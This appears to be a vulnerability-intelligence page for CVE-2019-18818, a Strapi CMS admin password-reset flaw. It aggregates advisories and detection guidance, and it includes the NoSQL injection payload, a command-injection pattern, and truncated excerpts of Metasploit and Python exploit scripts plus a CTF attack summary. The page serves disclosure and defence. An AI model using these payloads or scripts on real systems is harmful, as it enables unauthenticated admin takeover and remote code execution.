CVE-2019-18818
published 2019-11-07CVE-2019-18818: strapi before 3.0.0-beta.17.5 mishandles password resets within packages/strapi-admin/controllers/Auth.js and…
PriorityP188critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
97.64%
99.9th percentile
strapi before 3.0.0-beta.17.5 mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| strapi | strapi | <= 1.6.4 | — |
| strapi | strapi | — | — |
| strapi | strapi | >= 0 < 3.0.0-beta.17.5 | 3.0.0-beta.17.5 |
Detection & IOCsextracted from sources · hover to see the quote
command{"code": {"$gt": 0}, "password": "SuperStrongPassword1", "passwordConfirmation": "SuperStrongPassword1"}↗
yara↗
matchers on POST /admin/auth/reset-password with body containing '"username":' AND '"email":' AND '"jwt":' and HTTP 200
- →Detect unauthenticated password reset exploitation by monitoring POST requests to /admin/auth/reset-password containing a JSON body with a NoSQL injection operator in the 'code' field (e.g., {"$gt": 0} or empty object {}). ↗
- →A successful exploit response to /admin/auth/reset-password will return HTTP 200 with a JSON body containing 'jwt', 'username', and 'email' fields — monitor for this response pattern as a confirmation of compromise. ↗
- →After password reset, watch for POST requests to /admin/plugins/install with a 'plugin' field containing shell command injection patterns (e.g., 'documentation && $(cmd)'), indicating chained exploitation with CVE-2019-19609. ↗
- →The Metasploit auxiliary module for this CVE targets /admin/auth/reset-password via POST with Content-Type application/json and a JSON body containing 'code': {'$gt': 0}; detection should alert on this NoSQL operator in JSON POST bodies to Strapi admin endpoints. ↗
- ·The exploit also works with an empty object '{}' as the 'code' value (not just '$gt': 0), so detection rules must account for both variants of the NoSQL injection payload. ↗
- ·The vulnerability affects Strapi versions starting with '3.0.0-beta' and '3.0.0-alpha'; version checks against /admin/init or /admin/strapiVersion should be used to scope detection to vulnerable instances only. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
Strapi allows unauthenticated attacker to reset admin password without valid reset token
ghsa·2019-12-02
CVE-2019-18818 [CRITICAL] CWE-640 Strapi allows unauthenticated attacker to reset admin password without valid reset token
Strapi allows unauthenticated attacker to reset admin password without valid reset token
Versions of `strapi` prior to 3.0.0-beta.17.5 are vulnerable to Privilege Escalation. The password reset routes allows an unauthenticated attacker to reset an admin's password without providing a valid password reset token.
## Recommendation
Upgrade to version 3.0.0-beta.17.5 or later.
OSV
Strapi allows unauthenticated attacker to reset admin password without valid reset token
osv·2019-12-02
CVE-2019-18818 [CRITICAL] Strapi allows unauthenticated attacker to reset admin password without valid reset token
Strapi allows unauthenticated attacker to reset admin password without valid reset token
Versions of `strapi` prior to 3.0.0-beta.17.5 are vulnerable to Privilege Escalation. The password reset routes allows an unauthenticated attacker to reset an admin's password without providing a valid password reset token.
## Recommendation
Upgrade to version 3.0.0-beta.17.5 or later.
VulnCheck
strapi strapi Weak Password Recovery Mechanism for Forgotten Password
vulncheck·2019·CVSS 9.8
CVE-2019-18818 [CRITICAL] strapi strapi Weak Password Recovery Mechanism for Forgotten Password
strapi strapi Weak Password Recovery Mechanism for Forgotten Password
strapi before 3.0.0-beta.17.5 mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js.
Affected: strapi strapi
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://api.vulncheck.com/v3/index/sans-dshield?cve=CVE-2019-18818; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-26&host_type=src&vulnerability=cve-2019-18818; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-11&host_type=src&vulnerability=cve-2019-18818; https://dashboa
No detection rules found.
Exploit-DB
Strapi CMS 3.0.0-beta.17.4 - Set Password (Unauthenticated) (Metasploit)
exploitdb·2022-02-08·CVSS 9.8
CVE-2019-18818 [CRITICAL] Strapi CMS 3.0.0-beta.17.4 - Set Password (Unauthenticated) (Metasploit)
Strapi CMS 3.0.0-beta.17.4 - Set Password (Unauthenticated) (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule "Strapi CMS 3.0.0-beta.17.4 - Set Password (Unauthenticated) (Metasploit)",
'Description' => %q{
This exploit module abuses the mishandling of password reset in JSON for Strapi CMS version 3.0.0-beta.17.4 to change the password of a privileged user.
},
'License' => MSF_LICENSE,
'Author' => [ 'WackyH4cker' ],
'References' =>
[
[ 'URL', 'https://vulners.com/cve/CVE-2019-18818' ]
],
'Platform' => 'linux',
'Targets' => [
[ 'Strapi 3.0.0-beta-17.4', {} ]
],
'Payload' => '',
'Privileged' => true,
'DisclosureDate' => "",
'DefaultOptions' =>
Exploit-DB
Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated)
exploitdb·2021-08-30·CVSS 9.8
CVE-2019-18818 [CRITICAL] Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated)
Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated)
---
# Exploit Title: Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 2021-08-30
# Exploit Author: Musyoka Ian
# Vendor Homepage: https://strapi.io/
# Software Link: https://strapi.io/
# Version: Strapi CMS version 3.0.0-beta.17.4 or lower
# Tested on: Ubuntu 20.04
# CVE : CVE-2019-18818, CVE-2019-19609
#!/usr/bin/env python3
import requests
import json
from cmd import Cmd
import sys
if len(sys.argv) != 2:
print("[-] Wrong number of arguments provided")
print("[*] Usage: python3 exploit.py \n")
sys.exit()
class Terminal(Cmd):
prompt = "$> "
def default(self, args):
code_exec(args)
def check_version():
global url
print("[+] Checking Strapi CMS Version running")
version = requ
Exploit-DB
Strapi 3.0.0-beta - Set Password (Unauthenticated)
exploitdb·2021-08-30·CVSS 9.8
CVE-2019-18818 [CRITICAL] Strapi 3.0.0-beta - Set Password (Unauthenticated)
Strapi 3.0.0-beta - Set Password (Unauthenticated)
---
# Exploit Title: Strapi 3.0.0-beta - Set Password (Unauthenticated)
# Date: 2021-08-29
# Exploit Author: David Anglada [CodiObert]
# Vendor Homepage: https://strapi.io/
# Version: 3.0.0-beta
# Tested on: Linux
# CVE: CVE-2019-18818
#!/usr/bin/python
import requests
import sys
import json
userEmail = "[email protected]"
strapiUrl = "http://strapi.url"
newPassword = "codiobert"
s = requests.Session()
# Get strapi version
strapiVersion = json.loads(s.get("{}/admin/strapiVersion".format(strapiUrl)).text)
print("[*] strapi version: {}".format(strapiVersion["strapiVersion"]))
# Validate vulnerable version
if strapiVersion["strapiVersion"].startswith('3.0.0-beta') or strapiVersion["strapiVersion"].startswith('3.0.0-alpha'):
# Password
Nuclei
strapi CMS <3.0.0-beta.17.5 - Admin Password Reset
nuclei·CVSS 9.8
CVE-2019-18818 [CRITICAL] strapi CMS <3.0.0-beta.17.5 - Admin Password Reset
strapi CMS <3.0.0-beta.17.5 - Admin Password Reset
strapi CMS before 3.0.0-beta.17.5 allows admin password resets because it mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js.
Template:
id: CVE-2019-18818
info:
name: strapi CMS <3.0.0-beta.17.5 - Admin Password Reset
author: idealphase
severity: critical
description: strapi CMS before 3.0.0-beta.17.5 allows admin password resets because it mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js.
impact: |
An attacker can exploit this vulnerability to reset the admin password and gain unauthorized access to the Strapi CMS admin panel.
remediation: |
Upgrade Strapi
Metasploit
Strapi CMS Unauthenticated Password Reset
metasploit
Strapi CMS Unauthenticated Password Reset
Strapi CMS Unauthenticated Password Reset
This module abuses the mishandling of a password reset request for Strapi CMS version 3.0.0-beta.17.4 to change the password of the admin user. Successfully tested against Strapi CMS version 3.0.0-beta.17.4.
CTF
medium / README
ctf_writeups·CVSS 9.1
[CRITICAL] medium / README
---
layout: default
title: Medium Machines
parent: Machines
nav_order: 2
description: "112+ Medium HTB machine writeups with walkthroughs"
permalink: /machines/medium/
---
# HackTheBox - Medium Machines
> Comprehensive index of retired HTB Medium-difficulty machines with key techniques and attack path summaries.
**Total: 100+ machines** | Sorted roughly by retirement date (newest first)
---
## Machine Index
| # | Machine | OS | Key Techniques | Attack Path Summary | Writeup |
|---|---------|-----|----------------|---------------------|---------|
| 1 | Signed | Linux | Code Signing Bypass, Certificate Abuse | Forge code signature to deploy malicious update, escalate via trusted binary execution | [0xdf](https://0xdf.gitlab.io/2026/02/07/htb-signed.html) |
| 2 | Voleur | Linux | Data E
CTF
Horizontall / README
ctf_writeups·CVSS 9.8
CVE-2019-18818 [CRITICAL] Horizontall / README
# Horizontall - HackTheBox - Writeup
Linux, 20 Base Points, Easy
## Machine
## TL;DR
To solve this machine, we begin by enumerating open services using ```namp``` – finding ports ```22``` and ```80```.
***User***: Found subdomain ```api-prod``` on one of the JavaScript files, By enumerating the subdomain we found login page of ```Strapi``` system, Reset the ```admin``` password using ```CVE-2019-18818``` and using the same exploit we write our SSH public key to ```/opt/strapi/.ssh/authorized_keys``` directory which allows us to login using our SSH private key to get a shell as ```strapi``` user.
***Root***: Found local service on port ```8000``` (running as ```root```) which is```Laravel``` system, Using ```CVE-2021-3129``` we write our SSH public key to ```/root/.ssh/authorized_keys
CTF
easy / README
ctf_writeups·CVSS 6.0
[MEDIUM] easy / README
---
layout: default
title: Easy Machines
parent: Machines
nav_order: 1
description: "120+ Easy HTB machine writeups with walkthroughs"
permalink: /machines/easy/
---
# HackTheBox Easy Machines - Comprehensive Reference
> Complete catalog of retired HTB Easy machines with OS, key vulnerability, attack path summary, and quality writeup links.
**Total: 100+ Easy Machines** | Updated: April 2026
---
## Quick Navigation
- [Classic / Legacy Machines (2017-2019)](#classic--legacy-machines-2017-2019)
- [2019-2020 Machines](#2019-2020-machines)
- [2021 Machines](#2021-machines)
- [2022 Machines](#2022-machines)
- [2023 Machines](#2023-machines)
- [2024 Machines (Season 4 & 5)](#2024-machines-season-4--5)
- [2025-2026 Machines (Season 6+)](#2025-2026-machines-season-6)
---
## Classic / Legac
http://packetstormsecurity.com/files/163939/Strapi-3.0.0-beta-Authentication-Bypass.htmlhttp://packetstormsecurity.com/files/163950/Strapi-CMS-3.0.0-beta.17.4-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/165896/Strapi-CMS-3.0.0-beta.17.4-Privilege-Escalation.htmlhttps://github.com/strapi/strapi/pull/4443https://github.com/strapi/strapi/releases/tag/v3.0.0-beta.17.5https://www.npmjs.com/advisories/1311http://packetstormsecurity.com/files/163939/Strapi-3.0.0-beta-Authentication-Bypass.htmlhttp://packetstormsecurity.com/files/163950/Strapi-CMS-3.0.0-beta.17.4-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/165896/Strapi-CMS-3.0.0-beta.17.4-Privilege-Escalation.htmlhttps://github.com/strapi/strapi/pull/4443https://github.com/strapi/strapi/releases/tag/v3.0.0-beta.17.5https://www.npmjs.com/advisories/1311
2019-11-07
Published
Exploited in the wild